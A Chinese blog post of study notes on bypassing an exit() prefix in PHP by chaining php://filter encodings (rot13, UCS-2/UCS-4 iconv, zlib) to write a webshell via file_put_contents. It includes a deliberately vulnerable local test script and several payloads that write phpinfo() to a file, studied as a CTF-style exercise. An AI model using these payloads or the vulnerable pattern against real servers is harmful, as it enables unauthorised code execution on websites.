file_put_contents学习笔记

已于 2022-04-17 14:14:18 修改
阅读量2k 收藏 8
点赞数 4
分类专栏: 学习笔记 文章标签: 学习 web安全 php web app
于 2022-04-17 14:05:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62078839/article/details/124227983
版权

这几日在学习文件包含漏洞时碰到了一道绕过死亡exit();的题目,借此机会就学一学file_put_contents写入webshell

关于filter的知识:

php:// — 访问各个输入/输出流(I/O streams)php://input 是个可以访问请求的原始数据的只读流。

php://filter 是一种设计用来允许过滤器程序在打开时成为流的封装协议。这对于单独具有完整功能的文件函数非常有用,否则就没有机会在读取内容之前将过滤器应用于流之上。

该协议语法为:php://filter:/<action>=<name>

比如 php://filter:/resource=http://www.baidu.com

参数功能
read      读取
write写入
resource数据来源

string.strip_tags: 将数据流中的所有html标签清除
string.toupper: 将数据流中的内容转换为大写
string.tolower: 将数据流中的内容转换为小写

在本地搭好环境

<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_GET['content'])) {
    $content = $_GET['content'];
    if(file_exists($content))
        require_once($content);
    file_put_contents($content,$content);
}

这里我没有过滤任何过滤器主要是为了方便测试

无任何编码写入

payload:php://filter/write=<?php phpinfo();?>/resource=info.php

查看文件目录,成功写入

 查看文件,成功实现

Rot13

ROT13回转13位rotate by 13 places,有时中间加了个连字符称作ROT-13)是一种简易的替换式密码。Rot13是一种非常简单的替换加密算法,只能加密26个英语字母。

这里我们现需要关闭短标签服务才能使用,因为如果开启了短标签,我们是无法成功写入shell的

 

payload:php://filter/write=string.rot13|<?cuc cucvasb();?>|/resource=info.php

 iconv字符编码转换

头文件"iconv.h"。iconv命令可以将一种已知的字符集文件转换成另一种已知的字符集文件。

它的作用是在多种国际编码格式之间进行文本内码的转换。

支持的内码包括:Unicode相关编码,如UTF-8、UTF-16、UCS-2、UCS-4编码方式等等,各国采用的ANSI编码,其中包括GB2312、BIG5等中文编码方式。

这里我们列举UCS-2、UCS-4编码方式

<?php
echo iconv("UCS-2LE","UCS-2BE",'12345678');
echo iconv("UCS-4LE","UCS-4BE",'12345678');
?>
21436587
43218765

通过UCS-2或者UCS-4的方式,目标字符串会进行2或4位一反转

在使用相应的编码方式时,要使用相应的倍数,不然不能进行反转

UCS-2

payload:php://filter//convert.iconv.UCS-2LE.UCS-2BE|?<hp phpipfn(o;)>?/resource=info.php

 

UCS-4

这里我们需要将shell补齐为4的倍数

payload:php://filter//convert.iconv.UCS-4LE.UCS-4BE|?<ah phpiphp(ofn>?;)/resource=info.php

 

 zlib

可以利⽤ zlib 的 zlib.deflate 和 zlib.inflate 来做

payload:php://filter/zlib.deflate|zlib.inflate|<?phpinfo();?>/resource=info.php

 混合双打

我们可以利用多种编码方式混合写入shell,可用方法很多,这里就用UCS-2和rot13举一个例子吧

payload:php://filter/write=convert.iconv.UCS-2LE.UCS-2BE|string.rot13|?<uc cucvcsa(b;)>?/resource=info.php

 

H3018-R
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
file_put_contents() 利用技巧
iO快到碗里来
11-08 4110
0x00 Preface file_put_contents()函数:把一个字符串写入文件中。 var_dump()函数:显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。 fwrite()函数:将内容写入一个打开的文件中。 strcmp()函数:比较两个字符串。 strlen()函数:返回字符串的长度,中文字符串的处理使用 mb_strlen()函数。 md5()函数:计算字符串的 MD5 散列。 preg_match()函数:用于执行一个正则表达式匹配。
file_put_contents函数常用方法
fjnjxr的博客|PHP每周一贴
08-25 2643
1、file_put_contents (PHP 5, PHP 7) file_put_contents — 将一个字符串写入文件 int file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) 和依次调用 fopen()
PHP file_put_contents() 函数
子非鱼的博客
07-04 6525
定义和用法file_put_contents()函数把一个字符串写入文件中。该函数访问文件时,遵循以下规则:如果设置了FILE_USE_INCLUDE_PATH,那么将检查* filename *副本的内置路径如果文件不存在,将创建一个文件打开文件如果设置了LOCK_EX,那么将锁定文件如果设置了FILE_APPEND,那么将移至文件末尾。否则,将会清除文件的内容向文件中写入数据关闭文件并对所有文...
file_put_contents
weixin_44877577的博客
10-15 462
@file_put_contents 转载:https://www.php.net/file_put_contents file_put_contents (PHP 5, PHP 7) file_put_contents — 将一个字符串写入文件。 新的改变 和依次调用 fopen(),fwrite() 以及 fclose() 功能一样。: 该函数将返回写入到文件内数据的字节数,失败时返回FALSE ...
fileputcontents php,PHP中危险的file_put_contents函数详解
weixin_42592399的博客
03-11 822
前言最近在EIS上遇到一道文件上传的题,发现过滤了来看下file_put_contents函数第二个参数data的官网定义:data要写入的数据。类型可以是 string,array 或者是 stream 资源(如上面所说的那样)。如果 data 指定为 stream 资源,这里 stream 中所保存的缓存数据将被写入到指定文件中,这种用法就相似于使用 stream_copy_to_stream...
我的PHP学习笔记
09-03
4. **文件操作**:PHP可以用来读写文件,`fopen()`打开文件,`fwrite()`写入,`fclose()`关闭文件,`file_get_contents()`读取整个文件到字符串,以及`file_put_contents()`将字符串写入文件。 5. **表单处理**:在...
php基本语法学习笔记
08-02
例如,`file_get_contents()`用于读取文件内容,`file_put_contents()`则用于写入文件。 最后,PHP还有丰富的预定义常量和函数库,如MIME类型识别的`mime_content_type()`,URL编码解码的`urlencode()`和`urldecode...
php学习笔记之重要知识点总结
07-27
学会如何使用`fopen()`, `fwrite()`, `fclose()`读写文件,以及`file_get_contents()`和`file_put_contents()`读取或写入整个文件,将使你在处理数据存储时游刃有余。 然后是MySQL,这是与PHP常配合使用的数据库...
PHP学习笔记之目录与文件操作
03-21
若需写入文件,`file_put_contents()`是一个常用的选择。对于逐行读取文件,`file()`函数和`fopen()`, `fgets()`, `fclose()`组合使用是常见方法。 目录操作方面,`mkdir()`用于创建新目录,`rmdir()`用于删除空...
CTF-文件包含(持续更新)
最新发布
m0_74317362的博客
07-28 1086
任意文件包含漏洞处理方法和实例
PHP中危险的file_put_contents函数详解
10-19
file_put_contents() 函数把一个字符串写入文件中。最近发现file_put_contents函数有一直没注意到的问题,所以下面这篇文章主要给大家介绍了关于PHP中危险的file_put_contents函数的相关资料,需要的朋友可以参考借鉴,下面来一起看吧。
php file_put_contents 编码,PHP file_put_contents和UTF-8
weixin_39922004的博客
03-18 899
我有读取远程文件内容并将其写入本地服务器的脚本。 文件包含字符:???????ū?。 将数据插入本地文件后,UTF-8编码将丢失。我的脚本代码:$data = file_get_contents('remote_file_address');echo $data; //encoding is ok$file = dirname(__FILE__) . '/../downloads/data.csv...
php把提交的数据写入到配置文件中
zxh7770的博客
09-24 1589
php把提交的数据写入到配置文件中 在后台可以设置网站的基本信息,例如:title,keywords,copyright。等信息,这些信息只是一条数据,存入数据库耗费资源,直接写入到php文件中。 创建php文件。方便写入 我用的是laravel框架,在F:\project\redshop\resources\views\admin\set\system\website.blade.php,编辑w...
php教程写入,PHP向文件写入或追加数据_PHP教程
weixin_39537977的博客
03-19 196
PHP向文件写入或追加数据php向文件里写入或追加数据有两种方法,一种是fopen,还有一种是file_put_contents,本文简要介绍一下两种方法的具体用法,有需要的朋友可以看看。(1)fopenfopen() 函数打开文件或者 URL,如果打开失败,本函数返回 FALSE。语法:fopen(filename,mode,include_path,context)参数说明filenam...
获取Webshell的常用方法(一)
Captain_RB的博客
12-03 9701
Webshell是以php、asp、jsp等网站脚本文件形式存在的一种网页后门,攻击者可以利用web请求的方式,获得webshell,控制网站服务器,进而进行执行命令、上传下载文件等操作。本文主要介绍在渗透测试过程中获取Webshell的基本思路,实战中还需就地取材,灵活应对。
thinkphp 6.x 任意文件写入漏洞
Aiwin的博客
08-06 3789
thinkphp 6.x 任意文件写入漏洞
php file_put_contents写入文件
05-31
`file_put_contents` 是 PHP 内置的函数,可以用来将内容写入文件。下面是使用 `file_put_contents` 写入文件的示例代码: ```php <?php // 写入的内容 $content = "Hello, World!\n"; // 设置保存文件的路径和名称 $file_path = "/path/to/save/file.txt"; // 将内容写入文件 file_put_contents($file_path, $content, FILE_APPEND); ?> ``` 这段代码可以将指定的内容写入到文件中。你需要将 `$content` 替换为你需要写入的内容,将 `$file_path` 替换为你需要保存的文件路径和名称。如果需要追加内容到文件末尾,需要在 `file_put_contents` 函数的第三个参数中指定 `FILE_APPEND`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值